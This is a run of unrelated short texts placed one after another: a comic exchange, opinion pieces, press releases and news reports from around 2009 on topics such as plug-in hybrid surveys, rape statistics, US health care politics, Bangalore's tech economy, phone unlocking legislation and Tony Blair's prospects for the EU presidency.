Oh god .
Oh god .
I need a drink !
Wassa matter , ' naner ?
I just overheard these two bats talking , and one said , " Did you know all bananas are genetically identical ? "
I went home and looked it up and it's TRUE !
Wwhat .
This means my wife , the woman I 've loved for twelve years , is actually my ...
TWIN !
Oh god I 'm gonna be sick .
Hey .
Hey man .
Your wife is great .
And you 're great .
You guys .
You guys are my knees .
What ?
I do n't know .
What should we believe when the new head of the PSNI thinks that the Bible is free of error ?
Is this wise , or even tactful of him ?
What makes a Christian fundamentalist ?
This is an entirely serious question , to which I do n't know the answer , but it 's interesting in a Northern Irish context where the new head of the Police Service of Northern Ireland , Matt Baggot , is an unashamed evangelical protestant who believes that the Bible is " the Bible is the inspired Word of God without error " .
I know this because his office put out a press release saying what a devout Christian he is , which , in a Northern Irish context rather omits the interesting question .
But it 's easy enough to find that he is a member of the Christian Police Association , and that this is an evangelical protestant body , which holds that the Bible is not only without error , but " the only complete authority in all matters of faith and doctrine " .
The CPA also demands belief in a literal virgin birth , a physical resurrection , penal substitutionary atonement , and " that it is only by God 's grace and mercy that the sinful person is made right with Him through faith in Jesus Christ alone " which looks like straightforward Calvinist orthodoxy to me .
In my limited experience of Christian policemen , they tend not to be liberals , any more than Christian doctors do .
The evidence of sin is too much in front of them , and so is the failure of human efforts to do much about it ; if you 're going to believe in a God at all in that job , he needs to be capable of miracles .
Calling the Bible " without error " does not , I think , commit anyone to rejecting modern science .
After all , what matters there is to find the interpretation which fits the facts and then proclaim that it is without error .
I suspect this formulation is deliberate from the following claim , the the bible is " the only complete authority in all matters of faith and doctrine " .
This does n't of course mean ( or say ) that it is any sort of authority in matters of science ; what it clearly repudiates is the authority of the Pope .
That 's all right .
That 's what Protestants do .
But it does seem an odd thing for the head of a non-sectarian police service to boast of .
Perhaps this is a sign that Northern Ireland really has transcended its religious differences .
Or perhaps a demonstration that the media do n't understand religion .
Which do you think is more likely ?
DETROIT , Mich .---A
University of Michigan survey released today shows widespread consumer interest in buying plug - in hybrid electric vehicles ( PHEVs ) .
But the cost of the cars is much more influential than environmental and other non-economic factors as a predictor of purchase probabilities .
The survey of a nationally representative sample of 2,513 adults age 18 and over was conducted between July and November 2008 as part of the Reuters / University of Michigan Surveys of Consumers .
The findings were released at The Business of Plugging In : A Plug - In Electric Vehicle Conference in Detroit .
" The data provide strong evidence that a combination of economic and social incentives may be most effective in successfully introducing these vehicles , " said economist Richard Curtin , director of the Reuters / University of Michigan Surveys of Consumers , conducted by the U - M Institute for Social Research .
The study was supported by funds from the Pacific Northwest National Laboratory and the U - M Transportation Research Institute .
In addition to assessing the current state of knowledge and opinions about PHEVs , the survey addressed the willingness to pay for these vehicles given different cost and fuel savings scenarios .
Overall , when given no cost or fuel - saving estimates , 42 percent of those surveyed said there was at least some chance that they would buy a PHEV sometime in the future .
The researchers then asked respondents to rate the likelihood of purchasing a PHEV under three different cost - scenarios , each time assuming they would save 75 percent in fuel costs compared to a traditional , gasoline - powered vehicle .
With each successive doubling of the price of PHEVs , the probability of purchase fell by 16 percentage points .
On average , 46 percent of those surveyed said there was some chance they would purchase a PHEV that cost $ 2,500 more than a traditional vehicle ; 30 percent said there was a chance they would buy if the PHEV cost $ 5,000 more ; but just 14 percent said there was a chance if it cost an additional $ 10,000 .
The relationship between cost and purchase probabilities was clearly indicated by the proportions who said there was zero chance of buying or 100 percent chance of buying at the three different cost premiums presented in the survey .
" Indeed , 56 percent of all consumers responded that there was no chance that they would buy a PHEV at the top premium , " Curtin said .
" The proportion indicating a zero probability of purchase moves from nearly one - in - four at $ 2,500 , to one in three at $ 5,000 , to more than one in two at an added cost of $ 10,000 .
At the other extreme , those who said they were 100 percent certain that they would buy a PHEV reached a high of just 10 percent for the lowest added cost and fell to just 1 percent for the highest added cost . "
It should be no surprise that vehicle purchases , typically the second largest purchase households make , would be very sensitive to price , Curtin says .
But although consumer acceptance of PHEVs was not determined solely by cost issues , the role of environmental considerations played a smaller role in consumer attitudes about PHEVs than had been anticipated .
Half of all consumers reported that showing a commitment to the environment through the purchase of a PHEV was " very important " to them .
This kind of overt demonstration of a commitment to buying environmentally friendly products --- known as " badging " --- has long been recognized as a powerful influence on purchases of many different " green " products , Curtin says .
But when asked what they thought was the main advantage of a PHEV --- reducing money spent on fuel , reducing vehicle emissions or reducing dependence on foreign oil --- 54 percent reported that reducing dependence on foreign oil was the main advantage .
" Reducing vehicle emissions was by far the least frequently cited advantage , " Curtin said .
" Just 15 percent of all consumers cited that as the main advantage . "
Surprisingly , only 31 percent thought reducing money spent on fuel was the main advantage , even though the price of gas was high during the time the survey was conducted .
When the survey started in July 2008 , gas prices were near their all - time peak level ( $ 4.28 per gallon ) and then fell sharply during the period of data collection .
But the researchers found no relationship between PHEV purchase probabilities and the price of gas .
" The data provide strong evidence that a combination of economic and social incentives may be most effective for the successful introduction of PHEVs , " Curtin said .
" The survey also showed the significant influence of hybrid vehicles in signaling people 's commitment to a clean environment .
" Nonetheless , consumer attitudes toward the environment are less compelling than economic criteria in explaining hybrid purchase probabilities .
Presumably , if PHEVs are priced so that consumers can recoup their initial investments over a reasonable time period , consumers would find ample economic justification for their purchase .
The critical role of environmental and other non-economic attitudes may be to provide the initial burst of interest and sales to propel the appeal of PHEVs to the mass market . "
The analysis also examined how vehicle usage patterns and currently owned vehicle choices , as well as demographic characteristics such as age , income , education and gender , are connected to preferences for PHEVs .
Additional correlates of purchase probabilities , including location and availability of outlets for recharging , and preferences for new technologies , are also analyzed in the survey report .
###
The full report is available at www.umich.edu/~umsurvey
For those who write about rape , it 's rare to be called upon to cover good news .
However , a new report in USA Today would seem to be precisely that : the rates of reported rape are lower than they have been in 20 years .
Just because rape is less frequent , however , does not necessarily mean that it 's actually rare .
The report states that 89,000 women reported being raped in 2008 .
This is down from 109,062 reported rapes in 1992 .
The difference , from this year to that , is a drop of only about 18 % .
And , when we consider that rape continues to be underreported – statistics available at the Rape , Abuse and Incest National Network ( Rainn ) state that about 60 % of all sexual assaults are n't reported to the police – we 're looking at much higher numbers .
And then there are sexual offences that are not rape but are often no less damaging : all of the forced , coercive , abusive sexual encounters that do n't fit the precise legal definition of rape and generally fall under the heading of " sexual assault " .
That , too , takes the number up .
According to Rainn , there were 248,300 victims of rape and sexual assault in 2007 , not including victims younger than 12 .
There 's no question that sexual assault continues to be a serious problem .
Still , when we see a decline like this , it 's worth our time to ask what caused it .
The USA Today article credits several concrete factors : increased funding for rape prosecutions through the Violence Against Women Act , advances in DNA testing that make it easier to convict rapists and the widespread availability and use of rape kits that collect evidence after the fact .
But they also credit shifts in the culture , including increased awareness of rape and decreased tolerance both for sexual assault and for lines of thought which minimise it , excuse it or place the blame for it on its victims .
This last point is the most crucial .
And it 's important not to overstate the progress that has been made , as Michael Males , of the Centre on Juvenile and Criminal Justice , does in the article : " You do n't see the nightmarish trials of the 1960s where a woman 's reputation would be brought into question and people would conclude she deserved it . "
That would be a marvellously uplifting statement , were it not also blatantly untrue .
Women who take their rapists to court are still routinely blamed and denigrated , either by defence attorneys or by onlookers , and there are still some who argue that preventing rape is somehow inherently the victim 's responsibility .
Yet there is one difference between the victim - blaming of the 1960s and the victim - blaming of today : Nowadays , people know what to call it , and are willing to challenge it publicly .
" Victim - blaming " itself , once regarded as a strange and radical theory – what do you mean , the fault for rape lies with rapists ?
– is now a central part of our understanding of sexual assault and the culture surrounding it .
This does n't mean that it has stopped happening .
It means that , when it does happen , people are able to identify and resist it .
And this is the entire history of feminism and anti-rape activism : the history of people introducing ideas that are seen as prudish and crazy and extreme until they are understood as common sense .
Or , in some cases , law .
Here 's a history of some of the crazy ideas advocated by the feminist fringe : that rape is still rape if you were dating or married to your attacker , since knowing or even loving someone does not necessarily make it impossible for that person to hurt you .
That a woman 's prior sexual history should not be used as evidence against her in a rape trial , since having consented to sex in the past does not mean that you have implicitly consented to all sex thereafter .
That rape is still rape if a woman does not or cannot physically resist her attacker , since it is generally unwise to require that all rapes come with an accompanying beating .
That some rapists use no physical force whatsoever , and employ intimidation , coercion or intoxication as weapons , and that it is still rape if compliance is forced through these measures .
All of these ideas were once radical .
Indeed , there are still many people who regard some or all of them with deep hostility .
But most of them have become central to our understanding of sexual assault , and that understanding is often reflected in the changing rape laws of the last 40 years .
Rape has always been a hot - button issue .
No politician or judge in his or her right mind would take a pro-rape stand , now or in 1962 .
But this has n't stopped some of them from taking stands that are , in fact , pro-rape , whether due to poor understanding of the issue or bad priorities .
Consider the amendment to the defence appropriations bill recently passed in the Senate , which would cut the funding of defence contractors if they do not allow their employees to take rape cases to trial .
The amendment was inspired by the case of Jamie Lee Jones , who was gang - raped by her Halliburton co-workers in Iraq , and was prohibited by the terms of her employment contract from taking legal action .
It seems like eminently good common sense .
Yet 30 Republican senators voted against it , and one , Jeff Sessions of Alabama , called it " a political attack directed at Halliburton . "
I do n't doubt that Senator Sessions , if asked , would say that rape is generally a bad thing – but not as important to him as maintaining partisan boundaries , it appears .
In general , however , US society has gotten better at identifying and fighting rape , simply because more of us now know what it is and understand its seriousness , and fewer of us are willing to write it off as an awkward and unpleasant part of relationships or sex in general .
And without people to challenge the common understanding of " sex in general , " this would never have happened .
It appears that the percentage of rape victims who report their rapes has grown slightly higher ( 61 % of rapes are unreported now , as opposed to 69 % in 1996 ) even as the number of reported rapes has substantially dropped .
Though we may be sceptical of reports that claim total , unmitigated progress , it can't hurt to take stock of the progress we have made .
The ceaseless work of anti-rape advocates has resulted in more survivors willing to name and oppose rape .
And it has also resulted in the fact that people in general are now able to recognise which actions qualify as rape , and are willing to refrain from those actions or condemn them when they are undertaken by others .
We demanded that people understand rape as a crime and treat it as such .
And we are getting exactly what we asked for – not as much of it as we want , and not as quickly as we want , true , but we are getting it nonetheless .
It 's certainly true that feminists and anti-rape activists did not make this happen by congratulating themselves on their accomplishments or being purely , mindlessly content with various minor advances in the status quo .
They got it by being relentless , demanding , thick - skinned and willing to challenge conventional wisdom about rape and consent whenever possible .
Giving up now , or concluding that the battle is won , would be ridiculous and counterproductive .
But it is worthwhile to note that we are , in fact , winning .
If nothing else , it bolsters one 's willingness to go out there and demand better from the world .
For Immediate Release
Remind voters about Republican - initiated government - run health care plans
WASHINGTON – In the wake of President Obama ’s speech to Congress , America ’s third - largest party wants to remind voters about Republican support for government - run health care plans .
William Redpath , chairman of the Libertarian National Committee ( LNC ) commented , “ Make no mistake , the Libertarian Party is opposed to President Obama ’s health care plans , and his speech last night has not budged us .
But we also opposed Republican plans for big - government health care , many of which have been implemented in recent years . ”
In 2003 , President Bush and the Republican Congress enacted a Medicare prescription drug expansion .
It was originally expected to cost $ 400 billion , but just two years later the cost was revised upward to $ 1.2 trillion .
In 2006 , Republican Massachusetts Governor Mitt Romney supported and signed a bill that required all residents to purchase health insurance , and increased state health insurance funding .
In 2007 , Republican Texas Governor Rick Perry issued an executive order to force sixth - grade schoolgirls to receive HPV vaccinations .
This year , congressional Republicans put forward the “ Patients ’ Choice Act of 2009 , ” which would increase federal government spending and control of health care in a variety of ways .
The Libertarian Party has put a poll on on its home page to allow voters to choose which Republican plan is the most hypocritical .
Redpath said , “ Republicans are living in glass houses when they complain about the President ’s health care plans and the bills in the Democratic - controlled Congress . ”
Redpath continued , “ It ’s time for President Obama to be intellectually honest , himself , and to stop inferring that his ideas of health care reform are the only ones out there .
With neither of the major parties is there any serious discussion about letting individuals control their own health care dollars , moving away from employer - provided health insurance , and increasing competition among insurance companies by letting people purchase health insurance across state lines and among providers by taking a good , long look at medical education and licensure laws to allow potential providers to freely respond to health consumers ’ needs . ”
Redpath continued , “ But , before the President and the Gang of 535 even do that , it would be refreshing to at least hear them debate whether the federal government is empowered to be in the middle of all of this .
An honest reading of the Constitution might stimulate the right move — punting this to the states and the people . ”
The Libertarian Party favors a free market health care system .
The party ’s platform states , “ We favor restoring and reviving a free market health care system .
We recognize the freedom of individuals to determine the level of health insurance they want , the level of health care they want , the care providers they want , the medicines and treatments they will use and all other aspects of their medical care , including end - of - life decisions . ”
For more information , or to arrange an interview , call LNC executive director Wes Benedict at 202-333-0008 ext. 222 .
The LP is America ’s third - largest political party , founded in 1971 .
The Libertarian Party stands for free markets and civil liberties .
You can find more information on the Libertarian Party at our website .
###
A commuter runs to catch a train at Gare du Nord train station in Paris , January 29 , 2009 .
REUTERS / Gonzalo Fuentes
PARIS ( Reuters ) - A drunk French teenager narrowly escaped death on Sunday after falling asleep on a railway track and slumbering undisturbed as a high - speed train roared over him , police said .
The 19 - year old , whose name was not released , remained fast asleep face down on a stretch of track near Saint Nolff in southern Brittany , as the Quimper to Paris train passed , leaving only a few grease stains on the back of his jacket .
The driver saw the body lying on the tracks and slammed on the brakes , but was only able to stop a few hundred meters further on .
“ It was his unconscious state that saved him really , as he lay there completely still like a dead body , ” said a spokesman for the local police force , adding that the clearance under the train is only around 20 centimeters .
According to the spokesman , the teenager was making his way back from the Saint Nolff music festival when he stopped to take a nap on the railway line .
Roused by police and fire fighters who attended the scene , the young man gave a one - fingered salute before rolling over and going back to sleep .
He was subsequently transferred to a nearby hospital where police say he is still recovering from his alcohol binge .
“ He ’s not really aware of what happened , ” said the police spokesman .
By Jamillah Knowles
BBC News
MG Road is now a building site for the metro development
Bangalore is an Indian city where hi-tech and crippling poverty live side by side .
As the rate of development in Bangalore gathers pace , some fear that the many impoverished communities that also call the city home may be left behind .
The famous Infosys glass pyramid seen above temporary dwellings
Since the liberalisation of the Indian economy in the 1990s , the Indian tech sector has expanded rapidly .
The major players - including Microsoft , Infosys , Cisco and Google - exist in enormous " tech parks " crammed with tall , shiny office buildings .
Meanwhile on the same block , piles of rotting rubbish , beggars and stray dogs surround traffic that is heavy with pollution and often locked in a loud and aggressive jam .
Contrast in this city is not new ; the levels of poverty are growing faster than the tech industry as migrant workers from other states join the population to aid the development .
There are concerns that this impoverished population could be left behind in the city of the future , unless big businesses acknowledge that the local infrastructure is under a great deal of pressure .
Ethical business offline Many foreign businesses have set up outsourcing hubs in Bangalore and beyond - India is a leader in this type of business .
Meanwhile non-governmental organisations and aid workers struggle to support the poorer aspects of society , and many believe that big businesses could have a more influential hand in helping those who are not doing so well out of the tech boom .
Azim Premji is the chairman of Wipro , one of the largest companies in India .
He recognised the issues of his local communities and created the Azim Premji foundation .
It is a separate venture to his corporation and privately funded .
It addresses methods of education in the hope that supporting youth will mean creating a better society in the long run .
If corporations accept that their employees have a life beyond the work place then they should take some responsibility and reach out to that life .
Dileep Ranjekar
CEO , Azim Premji Foundation Foundation chief executive Dileep Ranjekar believes that large corporations could be making more effort to invest in their communities .
" Many corporate efforts are fairly myopic , narrow minded and self centred .
These are strong words but they are realities , " he argues .
" If corporations accept that their employees have a life beyond the workplace then they should take some responsibility and reach out to that life . "
Bangalore is not the only tech city in India .
Hyderabad was initially seen as a forerunner in the race for a technology capital .
Nishant Shah is the director of research at the Centre for Internet and Society .
He says that the problems Bangalore faces are not unique .
" People only look at the IT industry and economy in Bangalore .
But there are questions of culture , language and communities which also constitute this city . "
Culture change
However winds of political change may begin blow in the favour of smaller businesses , as India 's bureaucrats are starting to emerge from more diverse backgrounds .
Some live themselves in neighbourhoods that are officially designated as slum areas , and so have first - hand knowledge of the infrastructure problems that need to be addressed .
I think the argument about Bangalore changing too fast and growing too fast is a false argument .
Solomon Benjamin
National Institute for Advanced Studies
" It 's these political conflicts and upheavals that show what democracy is all about , " said Dr Solomon Benjamin , associate professor at the National Institute for Advanced studies .
" I think the argument about Bangalore changing too fast and growing too fast is a false argument . "
New order
On the surface it may look as though big business , outsourcing and technology have brought about a socio-economic catastrophe .
Along the Mahatma Gandhi Road , couples used to walk , people used to meet .
Today it is a muddy area where the already crazed traffic struggles to get around the metro site construction .
People do n't tend to want to spend time there .
Bangalore feels like a city in planning where too many people turned up to populate it too soon .
But it 's those people who will hopefully build and restructure their city to make it work for them .
Dileep Ranjekar believes that they will pull together .
" When the pride of a society is challenged , people unite .
Change comes when there is an acceptance that it is in the self interest of every individual .
Everyone sees the benefit of that .
You must create the right conditions . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
SEOUL , South Korea  North Korea restored regular border crossings for traffic going to South Korean factories in the North on Tuesday , while its leader , Kim Jong - il , reiterated his government ’s call for a peace treaty with the United States .
North Korea had previously called for talks with Washington to replace the truce  which fell short of a formal treaty  that ended the Korean War in 1953 .
“ We can ease tensions and remove the danger of war on the peninsula when the United States abandons its hostile policy and signs a peace treaty with us , ” Mr. Kim said in a commentary carried on Pyongyang Radio , which broadcasts North Korean government statements abroad .
The dispatch , which was released late Monday , did not say when Mr. Kim made the statement .
But the remark was the latest in a number of recent conciliatory overtures from the North .
By Charles Pelkey
Rabobank ’s Grischa Niermann protested a radio ban in the 10th stage of this year ’s Tour de France .
Photo : Graham Watson
The UCI management committee , meeting at the world championships in Switzerland , has voted to phase out the use of two - way radios in all aspects of road racing .
Accepting a UCI road commission recommendation , committee members agreed to broaden a ban that already applies to junior and under - 23 categories to all others , including the top tier of professional riders .
In a release issued late Wednesday , the committee noted that “ members were of the opinion that two - way radio distorts the nature of cycle sport .
They also took into account the desire expressed by the majority of those involved in cycling to prohibit the equipment . ”
In citing broad support for the proposal , the committee may have overlooked the strong opposition from teams and riders at this year ’s Tour de France , at which organizers had planned a ban to be applied to two stages of the race .
Riders spent the day soft - pedaling in apparent protest of the ban imposed during the 10th stage .
Tour organizers then cancelled plans to impose another radio ban on stage 13 .
The decision does not include a specific time table for the phase - out , but called on UCI staff to draft a schedule for future consideration .
As expected , the decision met immediate resistance from some top directors .
Astana ’s Johan Bruyneel , one of the most influential voices among team directors , told VeloNews the idea was a bad one .
“ I have the impression that the people who take those decisions are not in close touch with the sport on the road , ” Bruyneel said .
“ As every other director , saying useful things over the radio , I think it is absolutely nonsense to ban them .
Surely we will talk about this with the teams in the near future . ”
In other action , the management committee voted to appoint Liquigas ’ Roberto Amadio and Garmin - Slipstream ’s Jonathan Vaughters as team representatives to the panel .
As the deadline nears for a decision from the Copyright Office on EFF 's request for a renewal of the 2006 exemption from DMCA liability for handset unlocking , prepaid phone companies have opened a new front in the war on consumer choice with a bill called the Wireless Prepaid Access Device Enforcement Act of 2009 .
If passed , this legislation would make it a crime to purchase or " handle " a prepaid handset for the purpose of modifying the software that ties it to the network , or to sell the handset outside the U.S .
EFF represents three phone recyclers in the DMCA rulemaking .
These businesses take used handsets and , if possible , refurbish and resell them .
The used handsets allow people around the globe to afford the benefits of mobile phones , while keeping functional technology out of landfills and the heavy metals they contain out of our water supply .
But our clients are thwarted in finding homes for these perfectly good phones if the devices are locked to networks that purchasers do not want or cannot access , or if they cannot sell unfashionably old handsets in other countries .
Moreover , the average mobile phone user wants to know that if she buys a handset and does n't like her provider , she can switch to a company that gives better service .
Customer choice drives quality and innovation .
Over 8000 people signed EFF 's petition in support of phone exemptions for exactly this reason .
So , who would support a bill to prohibit unlocking ?
Prepaid providers like TracFone and Virgin Mobile subsidize the cost of the handsets they sell , and hope to make up the difference through monthly service fees .
But some " bulk unlockers " buy up all the subsidized handsets they can find , unlock them , and sell them at market rates , pocketing the difference .
Both prepaid companies have successfully brought a variety of unfair competition claims against bulk unlockers -- demonstrating that neither this bill nor the DMCA prohibitions that threaten phone recyclers and consumers are required to protect prepaid providers ' interests .
With this legislation , the prepaid wireless service companies would push the expense of protecting their business model onto the shoulders of the American taxpayer by making the FBI and the Justice Department investigate and prosecute handset unlocking for them .
Moreover , the bill does nothing to distinguish bulk unlocking arbitragers from phone recyclers or from customers who simply want to switch providers or sell their phones .
Here 's the choice this bill presents : Congress can force taxpayers to pay the cops to help TracFone and Virgin collect their month - to - month contract fees , or Congress can reject the bill and allow the public to keep the right to unlock their mobile phones , switch their providers , and recycle their handsets .
In our opinion , this should be an easy decision .
EFF will be watching this bill closely to make sure that we keep prepaid providers ' handsets out of landfill , and their hands out of your pocket .
In blue suit , crisp white shirt , the hair – matching his tie – a little greyer now , the right arm outstretched to make sure he understands exactly where the old road crossed the border , the former Prime Minister of the United Kingdom is standing on the edge of a bleak tract of waste land in south - western Qalqilya .
It is overlooked by the forbidding eight - metre slabs of concrete wall , a few defiantly decorated with murals of the black , green , white and red Palestinian flag , that unbreachably divides the town from Israel .
Beside him , Qalqilya's Fatah governor Rabeeh Khandaqji is explaining how the road we are on – now , thanks to the barrier , a dead end – was once among the busiest in the West Bank , connecting the town to the Israeli workplaces of almost 80 per cent of its labour force .
The international community 's Middle East envoy tells the Governor he noticed the boarded - up shops as his convoy made its way towards the wall , and listens carefully as he is told they are among 450 businesses which have closed in his town in the past decade .
" We hope Mr Blair is going to help us in Qalqilya , " Mr Khandaqji explains , " in the same way that he has helped Nablus and Jenin . "
The Governor 's remark is made to a mere handful of mainly local Palestinian journalists covering the envoy 's visit , underlining how far Blair has been from the international spotlight in recent months .
That is almost certainly about to change .
For if the Irish public vote " yes " in their second referendum on the Lisbon EU Treaty on 2 October then the debate will start in earnest about who can best fill the big brand - new job of full - time EU president the treaty will create .
The Irish referendum is not the only hurdle left for the Treaty to clear since the fiercely - eurosceptic Czech President Václav Klaus is still trying to delay his country 's ratification .
But an Irish vote in favour of Lisbon will be enough to trigger a wave of speculation on who will emerge in what could be the role of " Mr Europe " over the next five years .
And without even uttering a word to say he wants the job , Mr Blair is already being discussed in Brussels and across the capitals of the 27 member states as the biggest figure among the potential candidates .
If all goes to plan , a decision could be taken at next month 's EU summit .
It 's just possible that , however disappointingly for Mr Khandaqji , Blair will no longer be available , at least in his present post , to try and secure Qalqilya the better economic deal it badly needs .
The words the Governor uses to underline the importance he clearly attaches to the envoy 's visit are nevertheless instructive .
For the first time since Blair was appointed the international Quartet 's representative in June 2007 , West Bank Palestinians are beginning to see some change – albeit severely limited – for the better ; checkpoints have been eased round Nablus and between it and Jenin .
Nowhere is cause and effect cloudier than in the Middle East , and Blair is careful to tell the reporters in Qalqilya today that a major reason for the easing of conditions is that " the Obama administration has been fully behind it " , many critics argue that Benjamin Netanyahu 's government is doing this as a substitute for rather than a complement to the real political progress that diplomats – including Mr Blair – repeatedly point out is essential for a lasting improvement to day to day life for Palestinians .
Download the new Independent Premium app Sharing the full story , not just the headlines
That said , the World Bank has cautiously projected 5 per cent growth in the West Bank this year and acknowledged that Israel has taken " significant steps " to ease movement of Palestinians within parts of the west Bank , and of Israeli Arabs into the cities .
All those steps have been long urged by Blair .
Blair is n't boasting about that in Qalqilya .
One virtue of liberation from modern electoral politics is that you do n't , simply to survive , have to trumpet every achievement , however modest .
And he also knows that there is , as he will acknowledge two days later in his fourth - floor suite of offices in East Jerusalem 's elegant old American Colony Hotel , " a huge amount still to do " .
The World Bank report also points out that the lack of Palestinian access to external markets , not to mention resources like land ( Israel still directly controls and severely restricts Palestinian development on the 60 per cent of the West Bank classified as Area C ) is still stunting any real chance of a sustainable economy .
Nor has Netanyahu yet yielded to persistent requests from Blair to allot the promised bandwidth for a second Palestinian mobile phone company that would be as he himself puts , " an important indicator of whether the Palestinians are going to be allowed to run an economy properly " .
Today in Qalqilya Blair has not only seen first - hand the impact of the wall here on the Israeli border but has peered over the barrier on the city 's north - eastern side – it is a fence there – where it shuts off the local farmers from their own land to protect the red-roofed Jewish settlement of Tzofin .
Here in Qalqilya at least it's hard to imagine the economy growing much without a peace agreement that would allow Israel – at least partly – to open its border with the West Bank and remove the settlements that hem in the city to the east .
Convinced that economic improve - ment and political progress are mutually reinforcing , he says even of the easing checkpoints round Nablus , Hebron and Jenin : " If political negotiations do n't materialise then all this progress will be fragile . "
Persistently upbeat , he believes those negotiations will happen ; and he does not betray the slightest frustration .
He works pretty hard here on his monthly one - week trips , energetically pressing a detailed if unglamorous shopping list of improvements on ministers from Netanyahu down – from permits for a new industrial park in the Jordan Valley to cancelling a bar on expatriate Palestinian businessmen being allowed to enter Israel as well as the West Bank .
( " Oh , does that happen in governments ? " he says deadpan , when asked if the latter problem is a function of the right hand of the Israeli government not knowing what the left is doing . )
" Sometimes there is insufficient understanding not only on the Israeli side but in the international community that decisions that seem quite small about checkpoints or restrictions actually have quite a big impact on the ability of people to do things , " he explains .
With an exponentially more detailed knowledge of the territory than he had as a mere Prime Minister , he will tenaciously argue the case for removing a specific checkpoint with the relevant IDF commander : " He drives the Army crazy , " acknowledges one senior Israeli official .
Yet though he would never give the slightest hint of it , you cannot help wondering if just occasionally he would like to be free of the limits on a role whose mandate is inevitably narrowed by the fact that the US is going to be the only external agent that can force through the real political progress he knows is needed .
Especially since , just possibly , a job with a rather wider remit could soon be in sight .
Blair 's team , let alone the man himself , is studiously avoiding the topic of the EU presidency , even in private .
He is instead said to be his happy with his extensive portfolio , including the Middle East job , on which he regards himself as having , in a potentially crucial period , a great deal still to contribute .
Moreover the inevitably slow progress is hardly surprising , given that a powerful new US President has just failed to persuade Israel to freeze settlement construction for a year .
But his reticence also reflects the European political realities ; after 10 years as a Prime Minister , Blair is unwilling to launch a public campaign for a job he would almost certainly like but also knows he may not get and in a forum in which the favourite all too often falls at the last fence .
Daily coronavirus briefing
No hype , just the advice and analysis you need Enter your email address Continue Continue Please enter an email address Email address is invalid Fill out this field Email address is invalid Email already exists .
Log in to update your newsletter preferences
Register with your social account or click here to log in I would like to receive morning headlines Monday - Friday plus breaking news alerts by email Update newsletter preferences
His candidacy has the support of Gordon Brown – which is not negligible given that Brown has won credit points in Europe for not wavering in support of the Treaty after the Irish voted no the first time .
But UK backing is a necessary rather than a sufficient condition .
A still - more crucial axis is that between French President Nicolas Sarkozy and German Chancellor Angela Merkel .
Charles Grant , the well - informed director of the Centre for European Reform [ CER ] , Britain 's leading EU think - tank , says he believes both Merkel and Sarkozy are now on board for a Blair presidency – which he therefore thinks is " looking quite plausible " at present .
If Grant is correct , and if Merkel succeeds in casting the Social Democrats into opposition and forming a coalition with the liberal FDP after next week 's federal elections , she will have a much freer hand ; if she is stuck with the Social Democratic SPD , then their opposition to a Blair candidacy could be a problem .
For deep hostility to Blair , especially in parts of the European left , cannot be overlooked .
It 's easy to rehearse the reasons ; the Atlanticism , the failure to join the euro ; the perceived deference to press - inflamed eurosceptic opinion ; the economic liberal , free market , free trade agenda , and most of all Iraq .
The left of centre " family " in the European Parliament has already been wound up over Jose Manuel Barroso , who was confirmed last week as European commission President but whose hosting , as Portugese Prime Minister , of the fateful Azores summit before the Iraq invasion in March 2003 still deeply rankles .
The notion of one of the two chief guests at that Azores event getting an even bigger job is anathema to some MEPs ; and while the parliament will not have veto powers over the new presidency , it will have over that of of the also key job of High Representative , the new enhanced EU " foreign minister " the Treaty will also create .
Since the two jobs are being presented as a " package " , the parliament has the capacity to cause a lot of trouble .
Because Barroso is centre right there may be a groundswell on grounds of balance for an EU President on the centre left .
Blair , the most electorally - successful Labour leader in history , is nominally just that .
But the danger for a Blair candidacy is that of political orphanhood : the Christian Democrat centre right – not to mention the British Conservatives – may oppose him because he's in the wrong party ; but elements of the European left may also do so because they see him as deep down , if not a Conservative , at best a Christian Democrat at heart .
Yet these complaints may miss a crucial point .
For whether the member states like it or not this is – assuming the Treaty is approved – a defining moment for the EU .
The formal powers of the job remain vague .
But what they are will depend very much on who has it , and particularly who has it first , since that may define its remit for a generation or more .
One possibility is that the new president is not much more than a chairman of the European Council , a relatively - faceless bureaucrat who remains constantly overshadowed by the heads of the main member states .
But the idea behind it was to give the EU a new cohesion as a bloc , to help it punch at or above its weight , and provide – finally – an answer to Henry Kissinger 's famous question : " Who do I call if I want to talk to Europe ? "
Yet that role can only be established if the new president has enough stature to fill it .
Which is where Blair comes in .
Ironically if Merkel were to lose next week 's election , she would quickly emerge as a consensus candidate .
But all the signs are she will win , leaving Blair as pretty well the only potential candidate with that kind of profile .
There are no doubt other excellent candidates : three serving prime ministers are in the frame , Jan Peter Balkenende of Holland ; Herman Van Rompuy of Belgium ; and Finland 's Paavo Lipponen .
The French PM François Fillon has also been mentioned along with former Spanish Prime Minister Felipe González ( whose eligibility as a left candidate is seriously offset by the fact that he a man of the nineties who speaks little English . )
All are plausible , provided the assumption is that what the EU needs is merely a businesslike chairman .
But can they provide the real leadership that most pro-Europeans believe the EU badly needs if it is to become a more coherent global player in issues ranging from foreign and security policy to world trade ?
The CER's Charles Grant confesses to " mixed feelings " about Blair 's potential candidacy .
On the one hand he worries about his deep unpopularity among elements of the European centre left , because of the Iraq war .
" The fact that some people actually regard him as evil could make him less effective in the job , " he says .
On the other he has no difficulty in spelling out the case for Mr Blair .
" I have spent time in Russia , China and India recently and people there say : ' If you want us to engage with the EU , choose someone we 've heard of , do n't pick Jean - Claude Juncker [ Prime Minister ] of Luxembourg . ' "
And secondly , he 's a damned good communicator , which is hugely important for an organisation as complex as the EU . "
But in any case enthusiasts for a Blair candidacy point out that the worry that Blair is not sufficiently European for the job , is actually perverse .
Apart from the fact that in office Mr Blair 's instincts , if not always his achievements , were decidedly European , they argue that no - one who has watched him over the last decade can doubt that in such a job he will be a " good European " – using whatever levers and bases of power are available to him .
According to Denis MacShane , a Europe minister under Mr Blair : " Europe has a huge choice to make – whether to think big or behave small .
Big means
Blair ; small means AN other Prime Minister who can chair a meeting adequately but will not have the necessary leadership transcend the Brussels bureaucracy and the nationalist egos of the 27 EU member states . "
If that is right , there is a paradox here ; that to choose a leader who as a Prime Minister failed to take his country into the eurozone and chose to break with " old Europe " over his bitterly controversial support for the US military invasion of Iraq may actually be the most " European " thing to do .
Which is exactly the reason why , after early indications that David Cameron would be relaxed about Mr Blair getting the job , his deeply eurosceptic shadow foreign minister William Hague came out so vigorously against a Blair candidacy in July .
There is already plenty of anxiety in Brussels about a future Tory government ; indeed the nightmare scenario for many Europeans about Lisbon is that if the Irish vote yes , Czech President Klaus could delay the Treaty long enough for David Cameron to carry out his pledge to hold a referendum on the Treaty if it has not been ratified – one that could sabotage it once and for all .
